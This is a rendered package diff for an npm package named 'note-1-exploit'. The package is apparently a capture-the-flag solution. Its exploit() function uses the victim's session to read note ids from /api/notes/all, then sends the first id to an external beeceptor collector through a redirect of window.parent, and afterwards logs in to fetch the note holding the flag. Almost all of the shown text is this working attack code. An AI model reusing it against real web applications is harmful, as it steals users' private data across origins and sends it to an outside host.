note-1-exploit 1.0.29 → 1.0.30
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +4 -2
- package/package.json +1 -1
package/index.js
CHANGED
@@ -1,5 +1,5 @@
|
|
1
1
|
async function exploit() {
|
2
|
-
let
|
2
|
+
let flag_id = await fetch("/api/notes/all", {
|
3
3
|
"headers": {
|
4
4
|
"accept": "*/*",
|
5
5
|
"accept-language": "zh-TW,zh;q=0.9,en-US;q=0.8,en;q=0.7",
|
@@ -10,6 +10,8 @@ async function exploit() {
|
|
10
10
|
"mode": "cors",
|
11
11
|
"credentials": "include"
|
12
12
|
}).then(res => res.json())
|
13
|
+
.then(res => res[0].id);
|
14
|
+
window.parent.location.replace("https://omniman.free.beeceptor.com?q=" + flag_id);
|
13
15
|
let note_name = (Math.random() + 1).toString(36).substring(7);
|
14
16
|
await fetch("/login", {
|
15
17
|
"headers": {
|
@@ -26,7 +28,7 @@ async function exploit() {
|
|
26
28
|
"redirect": "follow",
|
27
29
|
"credentials": "include"
|
28
30
|
});
|
29
|
-
let flag_1 = await fetch("/api/notes?id=" +
|
31
|
+
let flag_1 = await fetch("/api/notes?id=" + flag_id, {
|
30
32
|
"headers": {
|
31
33
|
"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8",
|
32
34
|
"accept-language": "zh-TW,zh;q=0.9",
|